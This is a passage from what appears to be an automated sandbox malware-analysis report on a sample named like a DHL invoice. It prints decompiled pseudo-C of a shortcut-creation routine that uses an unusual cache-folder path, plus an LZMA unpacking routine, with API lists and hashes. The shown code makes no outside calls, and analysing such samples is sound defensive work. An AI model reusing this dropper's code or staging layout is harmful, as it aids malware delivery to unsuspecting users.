                                        				intOrPtr* _t63;
                                        				intOrPtr _t64;
                                        				intOrPtr* _t65;
                                        				intOrPtr* _t67;
                                        				intOrPtr* _t69;
                                        				intOrPtr* _t71;
                                        				intOrPtr* _t73;
                                        				intOrPtr* _t75;
                                        				intOrPtr* _t78;
                                        				intOrPtr* _t80;
                                        				intOrPtr* _t82;
                                        				intOrPtr* _t84;
                                        				int _t87;
                                        				intOrPtr* _t95;
                                        				signed int _t105;
                                        				signed int _t109;
                                        				void* _t111;
                                        
                                        				 *(_t111 - 0x10) = E00402B2C(0xfffffff0);
                                        				 *(_t111 - 0xc) = E00402B2C(0xffffffdf);
                                        				 *((intOrPtr*)(_t111 - 0x44)) = E00402B2C(2);
                                        				 *((intOrPtr*)(_t111 - 0x40)) = E00402B2C(0xffffffcd);
                                        				 *((intOrPtr*)(_t111 - 0x4c)) = E00402B2C(0x45);
                                        				_t55 =  *(_t111 - 0x24);
                                        				 *(_t111 - 0x88) = _t55 & 0x00000fff;
                                        				_t105 = _t55 & 0x00008000;
                                        				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                        				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
                                        				if(E004059DF( *(_t111 - 0xc)) == 0) {
                                        					E00402B2C(0x21);
                                        				}
                                        				_t59 = _t111 + 8;
                                        				__imp__CoCreateInstance(0x407410, _t87, 1, 0x407400, _t59); // executed
                                        				if(_t59 < _t87) {
                                        					L15:
                                        					 *((intOrPtr*)(_t111 - 4)) = 1;
                                        					_push(0xfffffff0);
                                        				} else {
                                        					_t63 =  *((intOrPtr*)(_t111 + 8));
                                        					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407420, _t111 - 0x1c);
                                        					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                        					if(_t64 >= _t87) {
                                        						_t67 =  *((intOrPtr*)(_t111 + 8));
                                        						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                        						if(_t105 == _t87) {
                                        							_t84 =  *((intOrPtr*)(_t111 + 8));
                                        							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto\\Styringsmidlernes\\Pinkfishes109\\Supersensitizations172\\Smaskforvirrede");
                                        						}
                                        						if(_t109 != _t87) {
                                        							_t82 =  *((intOrPtr*)(_t111 + 8));
                                        							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                        						}
                                        						_t69 =  *((intOrPtr*)(_t111 + 8));
                                        						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
                                        						_t95 =  *((intOrPtr*)(_t111 - 0x40));
                                        						if( *_t95 != _t87) {
                                        							_t80 =  *((intOrPtr*)(_t111 + 8));
                                        							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
                                        						}
                                        						_t71 =  *((intOrPtr*)(_t111 + 8));
                                        						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x44)));
                                        						_t73 =  *((intOrPtr*)(_t111 + 8));
                                        						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x4c)));
                                        						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                        							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                        							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x10), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                        								_t78 =  *((intOrPtr*)(_t111 - 0x1c));
                                        								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                        							}
                                        						}
                                        						_t75 =  *((intOrPtr*)(_t111 - 0x1c));
                                        						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                        					}
                                        					_t65 =  *((intOrPtr*)(_t111 + 8));
                                        					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                        					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                        						_push(0xfffffff4);
                                        					} else {
                                        						goto L15;
                                        					}
                                        				}
                                        				E00401423();
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t111 - 4));
                                        				return 0;
                                        			}






















                                        0x00402141
                                        0x0040214b
                                        0x00402155
                                        0x0040215f
                                        0x0040216a
                                        0x0040216d
                                        0x00402187
                                        0x0040218d
                                        0x00402193
                                        0x00402196
                                        0x004021a0
                                        0x004021a4
                                        0x004021a4
                                        0x004021a9
                                        0x004021ba
                                        0x004021c2
                                        0x0040229b
                                        0x0040229b
                                        0x004022a2
                                        0x004021c8
                                        0x004021c8
                                        0x004021d7
                                        0x004021db
                                        0x004021de
                                        0x004021e4
                                        0x004021f2
                                        0x004021f5
                                        0x004021f7
                                        0x00402202
                                        0x00402202
                                        0x00402207
                                        0x00402209
                                        0x00402210
                                        0x00402210
                                        0x00402213
                                        0x0040221c
                                        0x0040221f
                                        0x00402224
                                        0x00402226
                                        0x00402233
                                        0x00402233
                                        0x00402236
                                        0x0040223f
                                        0x00402242
                                        0x0040224b
                                        0x00402251
                                        0x00402258
                                        0x00402271
                                        0x00402273
                                        0x00402281
                                        0x00402281
                                        0x00402271
                                        0x00402284
                                        0x0040228a
                                        0x0040228a
                                        0x0040228d
                                        0x00402293
                                        0x00402299
                                        0x004022ae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402299
                                        0x004022a4
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • CoCreateInstance.OLE32(00407410,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                        Strings
                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede, xrefs: 004021FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede
                                        • API String ID: 123533781-3537119737
                                        • Opcode ID: 99e8bc42a3757380f2283ffcafc7e5a6c536564db9f2e77a1d72e4738346444a
                                        • Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
                                        • Opcode Fuzzy Hash: 99e8bc42a3757380f2283ffcafc7e5a6c536564db9f2e77a1d72e4738346444a
                                        • Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E00406666() {
                                        				unsigned short _t531;
                                        				signed int _t532;
                                        				void _t533;
                                        				void* _t534;
                                        				signed int _t535;
                                        				signed int _t565;
                                        				signed int _t568;
                                        				signed int _t590;
                                        				signed int* _t607;
                                        				void* _t614;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					if( *(_t614 - 0x40) != 0) {
                                        						 *(_t614 - 0x34) = 1;
                                        						 *(_t614 - 0x84) = 7;
                                        						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                        						L132:
                                        						 *(_t614 - 0x54) = _t607;
                                        						L133:
                                        						_t531 =  *_t607;
                                        						_t590 = _t531 & 0x0000ffff;
                                        						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                        						if( *(_t614 - 0xc) >= _t565) {
                                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                        							 *(_t614 - 0x40) = 1;
                                        							_t532 = _t531 - (_t531 >> 5);
                                        							 *_t607 = _t532;
                                        						} else {
                                        							 *(_t614 - 0x10) = _t565;
                                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                        							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                        						}
                                        						if( *(_t614 - 0x10) >= 0x1000000) {
                                        							L139:
                                        							_t533 =  *(_t614 - 0x84);
                                        							L140:
                                        							 *(_t614 - 0x88) = _t533;
                                        							goto L1;
                                        						} else {
                                        							L137:
                                        							if( *(_t614 - 0x6c) == 0) {
                                        								 *(_t614 - 0x88) = 5;
                                        								goto L170;
                                        							}
                                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                        							goto L139;
                                        						}
                                        					} else {
                                        						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        						__esi =  *(__ebp - 0x60);
                                        						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        						__ecx =  *(__ebp - 0x3c);
                                        						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        						__ecx =  *(__ebp - 4);
                                        						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        						if( *(__ebp - 0x38) >= 4) {
                                        							if( *(__ebp - 0x38) >= 0xa) {
                                        								_t97 = __ebp - 0x38;
                                        								 *_t97 =  *(__ebp - 0x38) - 6;
                                        							} else {
                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        							}
                                        						} else {
                                        							 *(__ebp - 0x38) = 0;
                                        						}
                                        						if( *(__ebp - 0x34) == __edx) {
                                        							__ebx = 0;
                                        							__ebx = 1;
                                        							L60:
                                        							__eax =  *(__ebp - 0x58);
                                        							__edx = __ebx + __ebx;
                                        							__ecx =  *(__ebp - 0x10);
                                        							__esi = __edx + __eax;
                                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                                        							__ax =  *__esi;
                                        							 *(__ebp - 0x54) = __esi;
                                        							__edi = __ax & 0x0000ffff;
                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        							if( *(__ebp - 0xc) >= __ecx) {
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        								__cx = __ax;
                                        								_t216 = __edx + 1; // 0x1
                                        								__ebx = _t216;
                                        								__cx = __ax >> 5;
                                        								 *__esi = __ax;
                                        							} else {
                                        								 *(__ebp - 0x10) = __ecx;
                                        								0x800 = 0x800 - __edi;
                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        								__ebx = __ebx + __ebx;
                                        								 *__esi = __cx;
                                        							}
                                        							 *(__ebp - 0x44) = __ebx;
                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                        								L59:
                                        								if(__ebx >= 0x100) {
                                        									goto L54;
                                        								}
                                        								goto L60;
                                        							} else {
                                        								L57:
                                        								if( *(__ebp - 0x6c) == 0) {
                                        									 *(__ebp - 0x88) = 0xf;
                                        									goto L170;
                                        								}
                                        								__ecx =  *(__ebp - 0x70);
                                        								__eax =  *(__ebp - 0xc);
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        								_t202 = __ebp - 0x70;
                                        								 *_t202 =  *(__ebp - 0x70) + 1;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        								goto L59;
                                        							}
                                        						} else {
                                        							__eax =  *(__ebp - 0x14);
                                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        							if(__eax >=  *(__ebp - 0x74)) {
                                        								__eax = __eax +  *(__ebp - 0x74);
                                        							}
                                        							__ecx =  *(__ebp - 8);
                                        							__ebx = 0;
                                        							__ebx = 1;
                                        							__al =  *((intOrPtr*)(__eax + __ecx));
                                        							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        							L40:
                                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        							__ecx =  *(__ebp - 0x58);
                                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        							 *(__ebp - 0x48) = __eax;
                                        							__eax = __eax + 1;
                                        							__eax = __eax << 8;
                                        							__eax = __eax + __ebx;
                                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        							__ax =  *__esi;
                                        							 *(__ebp - 0x54) = __esi;
                                        							__edx = __ax & 0x0000ffff;
                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        							if( *(__ebp - 0xc) >= __ecx) {
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        								__cx = __ax;
                                        								 *(__ebp - 0x40) = 1;
                                        								__cx = __ax >> 5;
                                        								__ebx = __ebx + __ebx + 1;
                                        								 *__esi = __ax;
                                        							} else {
                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        								 *(__ebp - 0x10) = __ecx;
                                        								0x800 = 0x800 - __edx;
                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        								__ebx = __ebx + __ebx;
                                        								 *__esi = __cx;
                                        							}
                                        							 *(__ebp - 0x44) = __ebx;
                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                        								L38:
                                        								__eax =  *(__ebp - 0x40);
                                        								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        									while(1) {
                                        										if(__ebx >= 0x100) {
                                        											break;
                                        										}
                                        										__eax =  *(__ebp - 0x58);
                                        										__edx = __ebx + __ebx;
                                        										__ecx =  *(__ebp - 0x10);
                                        										__esi = __edx + __eax;
                                        										__ecx =  *(__ebp - 0x10) >> 0xb;
                                        										__ax =  *__esi;
                                        										 *(__ebp - 0x54) = __esi;
                                        										__edi = __ax & 0x0000ffff;
                                        										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        										if( *(__ebp - 0xc) >= __ecx) {
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        											__cx = __ax;
                                        											_t169 = __edx + 1; // 0x1
                                        											__ebx = _t169;
                                        											__cx = __ax >> 5;
                                        											 *__esi = __ax;
                                        										} else {
                                        											 *(__ebp - 0x10) = __ecx;
                                        											0x800 = 0x800 - __edi;
                                        											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        											__ebx = __ebx + __ebx;
                                        											 *__esi = __cx;
                                        										}
                                        										 *(__ebp - 0x44) = __ebx;
                                        										if( *(__ebp - 0x10) < 0x1000000) {
                                        											L45:
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xe;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t155 = __ebp - 0x70;
                                        											 *_t155 =  *(__ebp - 0x70) + 1;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        										}
                                        									}
                                        									L53:
                                        									_t172 = __ebp - 0x34;
                                        									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                        									L54:
                                        									__al =  *(__ebp - 0x44);
                                        									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        									L55:
                                        									if( *(__ebp - 0x64) == 0) {
                                        										 *(__ebp - 0x88) = 0x1a;
                                        										goto L170;
                                        									}
                                        									__ecx =  *(__ebp - 0x68);
                                        									__al =  *(__ebp - 0x5c);
                                        									__edx =  *(__ebp - 8);
                                        									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        									 *( *(__ebp - 0x68)) = __al;
                                        									__ecx =  *(__ebp - 0x14);
                                        									 *(__ecx +  *(__ebp - 8)) = __al;
                                        									__eax = __ecx + 1;
                                        									__edx = 0;
                                        									_t191 = __eax %  *(__ebp - 0x74);
                                        									__eax = __eax /  *(__ebp - 0x74);
                                        									__edx = _t191;
                                        									L79:
                                        									 *(__ebp - 0x14) = __edx;
                                        									L80:
                                        									 *(__ebp - 0x88) = 2;
                                        									goto L1;
                                        								}
                                        								if(__ebx >= 0x100) {
                                        									goto L53;
                                        								}
                                        								goto L40;
                                        							} else {
                                        								L36:
                                        								if( *(__ebp - 0x6c) == 0) {
                                        									 *(__ebp - 0x88) = 0xd;
                                        									L170:
                                        									_t568 = 0x22;
                                        									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                        									_t535 = 0;
                                        									L172:
                                        									return _t535;
                                        								}
                                        								__ecx =  *(__ebp - 0x70);
                                        								__eax =  *(__ebp - 0xc);
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        								_t121 = __ebp - 0x70;
                                        								 *_t121 =  *(__ebp - 0x70) + 1;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        								goto L38;
                                        							}
                                        						}
                                        					}
                                        					L1:
                                        					_t534 =  *(_t614 - 0x88);
                                        					if(_t534 > 0x1c) {
                                        						L171:
                                        						_t535 = _t534 | 0xffffffff;
                                        						goto L172;
                                        					}
                                        					switch( *((intOrPtr*)(_t534 * 4 +  &M00406F09))) {
                                        						case 0:
                                        							if( *(_t614 - 0x6c) == 0) {
                                        								goto L170;
                                        							}
                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                        							_t534 =  *( *(_t614 - 0x70));
                                        							if(_t534 > 0xe1) {
                                        								goto L171;
                                        							}
                                        							_t538 = _t534 & 0x000000ff;
                                        							_push(0x2d);
                                        							asm("cdq");
                                        							_pop(_t570);
                                        							_push(9);
                                        							_pop(_t571);
                                        							_t610 = _t538 / _t570;
                                        							_t540 = _t538 % _t570 & 0x000000ff;
                                        							asm("cdq");
                                        							_t605 = _t540 % _t571 & 0x000000ff;
                                        							 *(_t614 - 0x3c) = _t605;
                                        							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                        							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                        							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                        							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                        								L10:
                                        								if(_t613 == 0) {
                                        									L12:
                                        									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                        									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                        									goto L15;
                                        								} else {
                                        									goto L11;
                                        								}
                                        								do {
                                        									L11:
                                        									_t613 = _t613 - 1;
                                        									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                        								} while (_t613 != 0);
                                        								goto L12;
                                        							}
                                        							if( *(_t614 - 4) != 0) {
                                        								GlobalFree( *(_t614 - 4)); // executed
                                        							}
                                        							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                        							 *(_t614 - 4) = _t534;
                                        							if(_t534 == 0) {
                                        								goto L171;
                                        							} else {
                                        								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                        								goto L10;
                                        							}
                                        						case 1:
                                        							L13:
                                        							__eflags =  *(_t614 - 0x6c);
                                        							if( *(_t614 - 0x6c) == 0) {
                                        								 *(_t614 - 0x88) = 1;
                                        								goto L170;
                                        							}
                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                        							_t45 = _t614 - 0x48;
                                        							 *_t45 =  *(_t614 - 0x48) + 1;
                                        							__eflags =  *_t45;
                                        							L15:
                                        							if( *(_t614 - 0x48) < 4) {
                                        								goto L13;
                                        							}
                                        							_t546 =  *(_t614 - 0x40);
                                        							if(_t546 ==  *(_t614 - 0x74)) {
                                        								L20:
                                        								 *(_t614 - 0x48) = 5;
                                        								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                        								goto L23;
                                        							}
                                        							 *(_t614 - 0x74) = _t546;
                                        							if( *(_t614 - 8) != 0) {
                                        								GlobalFree( *(_t614 - 8)); // executed
                                        							}
                                        							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                        							 *(_t614 - 8) = _t534;
                                        							if(_t534 == 0) {
                                        								goto L171;
                                        							} else {
                                        								goto L20;
                                        							}
                                        						case 2:
                                        							L24:
                                        							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                        							 *(_t614 - 0x84) = 6;
                                        							 *(_t614 - 0x4c) = _t553;
                                        							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                        							goto L132;
                                        						case 3:
                                        							L21:
                                        							__eflags =  *(_t614 - 0x6c);
                                        							if( *(_t614 - 0x6c) == 0) {
                                        								 *(_t614 - 0x88) = 3;
                                        								goto L170;
                                        							}
                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                        							_t67 = _t614 - 0x70;
                                        							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                        							__eflags =  *_t67;
                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                        							L23:
                                        							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                        							if( *(_t614 - 0x48) != 0) {
                                        								goto L21;
                                        							}
                                        							goto L24;
                                        						case 4:
                                        							goto L133;
                                        						case 5:
                                        							goto L137;
                                        						case 6:
                                        							goto L0;
                                        						case 7:
                                        							__eflags =  *(__ebp - 0x40) - 1;
                                        							if( *(__ebp - 0x40) != 1) {
                                        								__eax =  *(__ebp - 0x24);
                                        								 *(__ebp - 0x80) = 0x16;
                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        								__eax =  *(__ebp - 0x28);
                                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        								__eax =  *(__ebp - 0x2c);
                                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        								__eax = 0;
                                        								__eflags =  *(__ebp - 0x38) - 7;
                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        								__al = __al & 0x000000fd;
                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                        								__eax =  *(__ebp - 4);
                                        								__eax =  *(__ebp - 4) + 0x664;
                                        								__eflags = __eax;
                                        								 *(__ebp - 0x58) = __eax;
                                        								goto L68;
                                        							}
                                        							__eax =  *(__ebp - 4);
                                        							__ecx =  *(__ebp - 0x38);
                                        							 *(__ebp - 0x84) = 8;
                                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                        							goto L132;
                                        						case 8:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__eax =  *(__ebp - 4);
                                        								__ecx =  *(__ebp - 0x38);
                                        								 *(__ebp - 0x84) = 0xa;
                                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                        							} else {
                                        								__eax =  *(__ebp - 0x38);
                                        								__ecx =  *(__ebp - 4);
                                        								__eax =  *(__ebp - 0x38) + 0xf;
                                        								 *(__ebp - 0x84) = 9;
                                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                        							}
                                        							goto L132;
                                        						case 9:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								goto L89;
                                        							}
                                        							__eflags =  *(__ebp - 0x60);
                                        							if( *(__ebp - 0x60) == 0) {
                                        								goto L171;
                                        							}
                                        							__eax = 0;
                                        							__eflags =  *(__ebp - 0x38) - 7;
                                        							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                        							__eflags = _t258;
                                        							0 | _t258 = _t258 + _t258 + 9;
                                        							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                        							goto L75;
                                        						case 0xa:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__eax =  *(__ebp - 4);
                                        								__ecx =  *(__ebp - 0x38);
                                        								 *(__ebp - 0x84) = 0xb;
                                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                        								goto L132;
                                        							}
                                        							__eax =  *(__ebp - 0x28);
                                        							goto L88;
                                        						case 0xb:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__ecx =  *(__ebp - 0x24);
                                        								__eax =  *(__ebp - 0x20);
                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        							} else {
                                        								__eax =  *(__ebp - 0x24);
                                        							}
                                        							__ecx =  *(__ebp - 0x28);
                                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        							L88:
                                        							__ecx =  *(__ebp - 0x2c);
